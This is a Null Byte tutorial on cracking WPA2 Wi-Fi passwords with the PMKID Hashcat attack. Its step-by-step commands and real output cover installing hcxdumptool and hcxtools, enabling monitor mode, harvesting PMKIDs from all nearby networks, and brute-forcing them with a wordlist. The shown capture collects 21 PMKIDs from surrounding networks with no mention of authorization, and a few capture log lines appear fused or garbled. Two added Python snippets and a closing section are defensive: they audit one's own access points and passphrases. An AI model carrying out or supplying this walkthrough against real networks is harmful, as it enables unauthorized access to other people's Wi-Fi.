
Cracking WPA2 passwords with the new PMKID Hashcat attack « Null Byte :: WonderHowTo



Cracking the password of a WPA2 network has worked in roughly the same way for many years, but a newer attack requires less interaction and information than previous techniques and has the added advantage of being able to target access points that have no one connected. The latest attack against the PMKID uses Hashcat to crack WPA passwords and allows hackers to find networks with weak passwords more easily.

The old way to crack WPA2 passwords

The old way to crack WPA2 has been around for a long time and involves momentarily disconnecting a connected device from the access point that we want to try to crack. This has two disadvantages, which are essential for Wi-Fi hackers to understand.

The first drawback is the requirement that someone is connected to the network in order to attack it. The network password may be weak and very easy to break, but without a device connected to kick off briefly, there is no way to capture a handshake, so there is no chance of trying to crack it.

The second disadvantage of this tactic is that it is noisy and legally troubling, because it forces you to send packets that deliberately disconnect an authorized user from a service they pay to use. This type of unauthorized interference is technically a denial-of-service attack and, if sustained, is the same as jamming a network. It can get you in trouble and is easily detected using some of our earlier guides.

A new method for cracking passwords

Instead of relying on intercepting two-way communication between Wi-Fi devices to attempt to crack the password, an attacker can communicate directly with a vulnerable access point using the new method. On August 4, 2018, a post on the Hashcat forum described a new technique that uses an attack against the RSN IE (Robust Security Network Information Element) of a single EAPOL frame to capture the information needed to attempt a brute-force attack.

As with the previous attacks on WPA, the attacker must be close to the network that he wants to attack. The goal is to use a Kali-compatible wireless network adapter to collect the information needed from the network to brute-force the password. Instead of using Aireplay-ng or Aircrack-ng, we use a new wireless attack tool to do this, called hcxtools. The hcx tools allow us to interact with nearby Wi-Fi networks to capture WPA handshakes and PMKID hashes. They work similarly to Besside-ng in that they require minimal arguments to start an attack from the command line, can be run against specific targets or targets of convenience, and can be executed quickly over SSH on a Raspberry Pi or another device without a screen.

After the PMKID has been recorded, the next step is to load the hash into Hashcat and try to crack the password. Here, hcxtools differs from Besside-ng because a conversion step is required to prepare the file for Hashcat. We will use hcxpcaptool to convert our PCAPNG file to one that Hashcat can work with, leaving only the step of selecting a robust list of passwords for your brute-forcing attempts.

It is worth noting that not every network is vulnerable to this attack. Because the PMKID is an optional field that is added by some manufacturers, you cannot expect universal success with this technique. Whether you can capture the PMKID depends on whether the manufacturer of the access point did you the favor of including an element that contains it, and whether you can crack the captured PMKID depends on whether the underlying password is in your brute-force password list. If either of these conditions is not met, this attack will fail.

What You Need

To try this attack, you must run Kali Linux and have access to a wireless network adapter that supports monitor mode and packet injection. We have several guides on how to select a compatible wireless network adapter below.

In addition to a Kali-compatible network adapter, ensure that you have fully updated and upgraded your system. If you do not, some packages may be out of date and cause problems during capture.

Recommended: The Alfa AWUS036NHA 2.4 GHz

Step 1: Install Hcxtools and Hashcat

First, we will install the tools we need. Type the following in a terminal window to download them.

~# git clone https://github.com/ZerBea/hcxdumptool.git

Cloning into 'hcxdumptool'...
remote: Enumerating objects: 133, done.
remote: Counting objects: 100% (133/133), done.
remote: Compressing objects: 100% (97/97), done.
remote: Total 2127 (delta 82), reused 76 (delta 36), pack-reused 1994
Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB/s, done.
Resolving deltas: 100% (1434/1434), done.

Then change into the directory and finish the installation with make and then make install.

~# cd hcxdumptool
~/hcxdumptool# make

cc -O3 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -lcrypto

~/hcxdumptool# make install

cc -O3 -Wall -Wextra -std=gnu99 -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99 -o hcxdumptool hcxdumptool.c -lcrypto
install -m 0755 -D hcxpioff /usr/local/bin/hcxpioff
install -m 0755 -D hcxdumptool /usr/local/bin/hcxdumptool
rm -f hcxpioff
rm -f hcxdumptool
rm -f *.o *~

When the installation is complete, we will move on to installing hcxtools. To do this, open a new terminal window or leave the /hcxdumptool directory, then install hcxtools.

~/hcxdumptool# cd
~# git clone https://github.com/ZerBea/hcxtools.git

Cloning into 'hcxtools'...
remote: Enumerating objects: 120, done.
remote: Counting objects: 100% (120/120), done.
remote: Compressing objects: 100% (82/82), done.
remote: Total 6196 (delta 77), reused 79 (delta 38), pack-reused 6076
Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB/s, done.
Resolving deltas: 100% (4320/4320), done.

Then change into the directory and run make and make install as before. If you get an error message, try typing sudo before the command.

~# cd hcxtools
~/hcxtools# make

mkdir -p .deps
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashtool.d -o hcxhashtool hcxhashtool.c -lcrypto -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpsktool.d -o hcxpsktool hcxpsktool.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxwltool.d -o hcxwltool hcxwltool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancap2wpasec.d -o wlancap2wpasec wlancap2wpasec.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/whoismac.d -o whoismac whoismac.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpmkidtool.d -o hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2john.d -o wlanhcx2john wlanhcx2john.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhashcattool.d -o hcxhashcattool hcxhashcattool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxmactool.d -o hcxmactool hcxmactool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxessidtool.d -o hcxessidtool hcxessidtool.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxhash2cap.d -o hcxhash2cap hcxhash2cap.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhc2hcx.d -o wlanhc2hcx wlanhc2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanwkp2hcx.d -o wlanwkp2hcx wlanwkp2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxinfo.d -o wlanhcxinfo wlanhcxinfo.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcx2ssid.d -o wlanhcx2ssid wlanhcx2ssid.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanhcxcat.d -o wlanhcxcat wlanhcxcat.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanpmk2hcx.d -o wlanpmk2hcx wlanpmk2hcx.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlanjohn2hcx.d -o wlanjohn2hcx wlanjohn2hcx.c
cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/wlancow2hcxpmk.d -o wlancow2hcxpmk wlancow2hcxpmk.c

~/hcxtools# make install

install -m 0755 -D hcxpcapngtool /usr/local/bin/hcxpcapngtool
install -m 0755 -D hcxhashtool /usr/local/bin/hcxhashtool
install -m 0755 -D hcxpsktool /usr/local/bin/hcxpsktool
install -m 0755 -D hcxwltool /usr/local/bin/hcxwltool
install -m 0755 -D wlancap2wpasec /usr/local/bin/wlancap2wpasec
install -m 0755 -D whoismac /usr/local/bin/whoismac
install -m 0755 -D hcxpmkidtool /usr/local/bin/hcxpmkidtool
install -m 0755 -D wlanhcx2john /usr/local/bin/wlanhcx2john
install -m 0755 -D hcxpcaptool /usr/local/bin/hcxpcaptool
install -m 0755 -D hcxhashcattool /usr/local/bin/hcxhashcattool
install -m 0755 -D hcxmactool /usr/local/bin/hcxmactool
install -m 0755 -D hcxessidtool /usr/local/bin/hcxessidtool
install -m 0755 -D hcxhash2cap /usr/local/bin/hcxhash2cap
install -m 0755 -D wlanhc2hcx /usr/local/bin/wlanhc2hcx
install -m 0755 -D wlanwkp2hcx /usr/local/bin/wlanwkp2hcx
install -m 0755 -D wlanhcxinfo /usr/local/bin/wlanhcxinfo
install -m 0755 -D wlanhcx2ssid /usr/local/bin/wlanhcx2ssid
install -m 0755 -D wlanhcxcat /usr/local/bin/wlanhcxcat
install -m 0755 -D wlanpmk2hcx /usr/local/bin/wlanpmk2hcx
install -m 0755 -D wlanjohn2hcx /usr/local/bin/wlanjohn2hcx
install -m 0755 -D wlancow2hcxpmk /usr/local/bin/wlancow2hcxpmk

Finally, we have to install Hashcat, which should be simple, because it is included as standard in the Kali Linux repo. Simply type the following to install the latest version of Hashcat.

~/hcxtools# cd
~# apt install hashcat

Reading package lists... Done
Building dependency tree
Reading state information... Done
hashcat is already the newest version (5.1.0+ds1-1).
The following packages were automatically installed and are no longer required:
libdouble-conversion1 liblinear3
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded.

With this complete we can continue to set up the wireless network adapter.

Step 2: Prepare the wireless network adapter

After plugging in your Kali-compatible wireless network adapter, you can find its name by typing ifconfig or ip a. It is usually named something like wlan0. The first step is to put the card into wireless monitor mode so that we can listen to Wi-Fi traffic in the immediate area.

To do this, type the following command in a terminal window, substituting the name of your wireless network adapter for wlan0.

~# airmon-ng start wlan0

Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

  PID Name
  555 NetworkManager
  611 wpa_supplicant
 6636 dhclient

PHY     Interface   Driver      Chipset

phy0    wlan0       ath9k       Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
        (mac80211 station mode vif disabled for [phy0]wlan0)
phy1    wlan1       ath9k_htc   Atheros Communications, Inc. AR9271 802.11n

Your wireless network adapter should now have a name like "wlan0mon" and be in monitor mode. You can confirm this by running ifconfig again.

Step 3: Use Hcxdumptool to capture PMKIDs from local networks

Now we are ready to capture the PMKIDs of devices that we want to attempt to attack. With our wireless network adapter in monitor mode as "wlan1mon", we run the following command to start the attack.

~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable_status=1

Breaking this down, -i tells the program which interface we are using, in this case wlan1mon. The file name to which we save the results can be specified with the -o flag argument. The channel on which we want to scan can be indicated with the -c flag followed by the number of the channel to scan.

In our command above, we use wlan1mon to save captured PMKIDs to a file called "galleria.pcapng." Although you can specify a different status value, I have been unsuccessful with any value except 1.

warning: NetworkManager is running with pid 555
warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233ca8bc5
MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 62439
ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956

[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID]
[22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [19659047] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696]
[22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247]
[22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832]
[22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [19659054] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009] e0220453a576 - cc2dc8d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d
INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0

Once you have collected enough, you can stop the program by pressing Ctrl-C to end the attack. This should produce a PCAPNG file that contains the information we need to attempt a brute-forcing attack, but we must convert it to a format that Hashcat can understand.

Step 4: Use Hcxpcaptool to convert the Dump for Hashcat

To convert our PCAPNG file, we use hcxpcaptool with a few specified arguments. In the same folder where your .PCAPNG file is stored, execute the following command in a terminal window.

~# hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng

This command tells hcxpcaptool to use the information in the file to help Hashcat understand it, using the flags -E, -I and -U. The flag -z is used for the name of the newly converted file that Hashcat will use, and the last part of the command is the PCAPNG file that we want to convert.

Executing the command should show us the following.

summary:
--------
file name....................: galleria.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 1089
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 732
beacons (with ESSID inside)..: 49
probe requests...............: 26
probe responses..............: 40
association requests.........: 103
association responses........: 204
reassociation requests.......: 2
reassociation responses......: 7
authentications (OPEN SYSTEM): 346
authentications (BROADCOM)...: 114
authentications (APPLE)......: 1
EAPOL packets................: 304
EAPOL PMKIDs.................: 21
best handshakes..............: 4 (ap-less: 1)

21 PMKID(s) written to galleriahC.16800

Here we can see that we have collected 21 PMKIDs in a short time. Now we can use the "galleriaHC.16800" file in Hashcat to crack network passwords.

Step 5: Select a Password List and Brute Force with Hashcat

To attack the hashes that we have captured, we will have to choose a good password list. You can find several good password lists to get started in the SecLists collection. Once you have a password list, place it in the same folder as the .16800 file that you just converted and run the following command in a terminal window.

~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'

With this command we launch Hashcat in mode 16800, which is intended for attacking WPA-PMKID-PBKDF2 network protocols. Next, we specify the name of the file that we want to crack, in this case "galleriaHC.16800." The -a flag tells Hashcat which type of attack to use, in this case a "straight" attack, and then the -w and --kernel-accel=1 flags specify the workload profile with the highest performance. If your computer has performance problems, you can decrease the number in the -w argument.

Next, the --force option ignores all warnings to continue the attack, and the last part of the command indicates the password list that we use to try to brute-force the PMKIDs in our file, in this case called "topwifipass.txt".

hashcat (v4.2.1) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU

Hashes: 21 digests; 21 unique digests, 20 unique salts

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll'
Dictionary cache hit:

* Filename..: topwifipass.txt
* Passwords.: 4801
* Bytes.....: 45277
* Keyspace..: 4801

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Depending on your hardware speed and the size of your password list, this can take quite some time to complete. To view the status at any time, you can press the S key for an update.

Step 6: Interpreting the Results

As Hashcat cracks away, you can check in on its progress to see if any keys have been recovered.

Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs)
Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 30180/96020 (31.43%)
Rejected.........: 0/30180 (0.00%)
Restore.Point....: 1508/4801 (31.41%)
Candidates.#1....: peter123 -> money man
HWMon.Dev.#1.....: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs)
Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 76736/96020 (79.92%)
Rejected.........: 0/76736 (0.00%)
Restore.Point....: 3836/4801 (79.90%)
Candidates.#1....: monopoli -> mercenary
HWMon.Dev.#1.....: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

When the password list is nearing its end, Hashcat will automatically adjust the workload and give you a final report when it completes.

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: hotspotcap.16800
Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)
Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9602/9602 (100.0%)
Rejected.........: 2/9602 (0.02%)
Restore.Point....: 4801/4801 (100.0%)
Candidates.#1....: 159159159 -> 00001111
HWMon.Dev.#1.....: N/A

Started: Sun Oct 28 18:05:56 2018
Stopped: Sun Oct 28 18:09:49 2018

If you have succeeded in cracking any passwords, you will see them here. During our test run, none of the PMKIDs that we had collected had passwords that were in our password list, so we were unable to crack any hashes. This will probably also be your result for networks with a strong password, but expect to see results here for networks with a weak password.

The PMKID Hashcat attack makes Wi-Fi attacks easier

While the new attack on Wi-Fi passwords makes it easier for hackers to try an attack on a target, the same methods that were effective against previous types of WPA cracking remain effective. If your network does not even support the robust security network element containing the PMKID, this attack has no chance of success. You can check your own network with hcxtools to see if it is susceptible to this attack.
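For the self-check mentioned above, the following added example (not code from the original guide or from the hcxtools project) reads hcxdumptool status lines in the format shown in Step 3 and reports, for the BSSIDs you administer, the worst PMKID exposure that was logged. It assumes the MAC to the left of "->" is the access point, since the right-hand MAC in the CLIENT-LESS lines is the tool's own station MAC from the capture header (fcc233ca8bc5); the inventory list is hypothetical.

```python
import re

# Constructed sample: status lines copied from the capture output in Step 3,
# including one line where two entries were fused in the page's text.
SAMPLE_LOG = """\
[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID]
[22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [19659047] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK]
[22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247]
[22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
""".splitlines()

# "<mac> -> <mac> [FOUND ...]"; text after a comma inside the brackets is dropped.
EVENT_RE = re.compile(
    r"([0-9a-fA-F]{12})\s*->\s*([0-9a-fA-F]{12})\s*\[(FOUND [A-Z -]+?)(?:,[^\]]*)?\]"
)

# Higher number = worse exposure for the access point.
SEVERITY = {
    "not observed": 0,
    "PMKID seen with a client": 1,       # [FOUND PMKID]
    "PMKID handed out client-less": 2,   # [FOUND PMKID CLIENT-LESS]
}
EVENT_TO_FINDING = {
    "FOUND PMKID": "PMKID seen with a client",
    "FOUND PMKID CLIENT-LESS": "PMKID handed out client-less",
}


def normalise_mac(mac):
    """'C8:B5:AD:B6:15:EA' -> 'c8b5adb615ea' (the form the log uses)."""
    return re.sub(r"[^0-9a-f]", "", mac.lower())


def audit_capture_log(lines, owned_bssids):
    """Return {bssid: worst PMKID finding} for the BSSIDs you administer.

    Assumption: the MAC left of '->' is the access point.
    """
    findings = {normalise_mac(m): "not observed" for m in owned_bssids}
    for line in lines:
        for ap, _peer, event in EVENT_RE.findall(line):
            ap = ap.lower()
            finding = EVENT_TO_FINDING.get(event)
            if ap not in findings or finding is None:
                continue  # not in the inventory, or a handshake event
            if SEVERITY[finding] > SEVERITY[findings[ap]]:
                findings[ap] = finding
    return findings


if __name__ == "__main__":
    # Hypothetical inventory: three MACs from the sample plus one constructed BSSID.
    mine = ["c8:b5:ad:b6:15:ea", "2C:95:69:4F:3C:A0", "1c872c707c60", "02:00:00:00:00:01"]
    for bssid, finding in audit_capture_log(SAMPLE_LOG, mine).items():
        print(bssid, "->", finding)
```

An access point reported as "PMKID handed out client-less" gave up crackable material with no legitimate client present, so its passphrase strength is the only remaining control.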

Even if your network is vulnerable, a strong password is still the best defense against an attacker gaining access to your Wi-Fi network using this or another password cracking attack.

Because these attacks depend on guessing the password that the Wi-Fi network uses, there are two common sources of guesses. The first is users who choose default or outrageously bad passwords, such as '12345678' or 'password'. These will be cracked easily. The second source of password guesses comes from data breaches that reveal millions of real user passwords. Because many users will reuse passwords between different types of accounts, these lists are generally very effective in cracking Wi-Fi networks.

I hope you enjoyed this guide for the new PMKID-based Hashcat attack on WPA2 passwords! If you have questions about this tutorial about cracking Wi-Fi passwords or have a comment, you can reach me on Twitter @KodyKinzie.

Don't miss: Null Byte's collection of Wi-Fi Hacking Guides
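To turn the two guess sources above into a check on your own passphrase, here is an added example (not from the original guide): it audits a candidate WPA2 passphrase against a wordlist and shows why the run in Step 6 had 96020 guesses to make from a 4801-word list. The ESSID "Galleria", the passphrases and the three-word list are constructed; the 8 to 63 bounds are the kernel limits Hashcat printed in Step 5.

```python
import re

MIN_LEN, MAX_LEN = 8, 63  # passphrase length limits reported by Hashcat in Step 5


def exhaust_seconds(candidates, unique_salts, hashes_per_second):
    """Time to run a whole wordlist: the ESSID is the PBKDF2 salt, so every
    candidate is computed once per unique ESSID in the hash file."""
    return candidates * unique_salts / hashes_per_second


def variants(psk):
    """Forms a simple rule-based attack reaches from a wordlist entry:
    the passphrase lowercased, and with trailing digits/symbols removed."""
    low = psk.lower()
    stem = re.sub(r"[\d\W_]+$", "", low)
    return {low, stem} - {""}


def audit_psk(psk, essid, wordlist):
    """Return a list of findings for a passphrase; an empty list means none."""
    words = {w.strip() for w in wordlist if w.strip()}
    lowered = {w.lower() for w in words}
    findings = []
    if not MIN_LEN <= len(psk) <= MAX_LEN:
        findings.append("length outside 8-63")
    if psk in words:
        findings.append("exact wordlist match")
    elif variants(psk) & lowered:
        findings.append("wordlist match after simple mutation")
    if psk.isdigit():
        findings.append(f"digits only: keyspace 10^{len(psk)}")
    if essid and essid.lower() in psk.lower():
        findings.append("contains ESSID")
    return findings


if __name__ == "__main__":
    wordlist = ["12345678", "password", "peter123"]  # constructed stand-in list
    for psk in ["12345678", "Password2018!", "galleria-wifi", "vR7#qLm2xT9pZw4k"]:
        print(f"{psk!r:22} {audit_psk(psk, 'Galleria', wordlist) or 'no findings'}")
    # Figures from the page: 4801 passwords, 20 unique salts, 64 H/s on a CPU.
    secs = exhaust_seconds(4801, 20, 64)
    print(f"4801 x 20 = {4801 * 20} guesses, about {secs / 60:.0f} minutes at 64 H/s")
```

The 25-minute result matches the gap between Time.Started and Time.Estimated in the first status output; a passphrase with no findings is simply absent from that work, however fast the hardware.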

Cover photo and screenshots by Kody / Null Byte



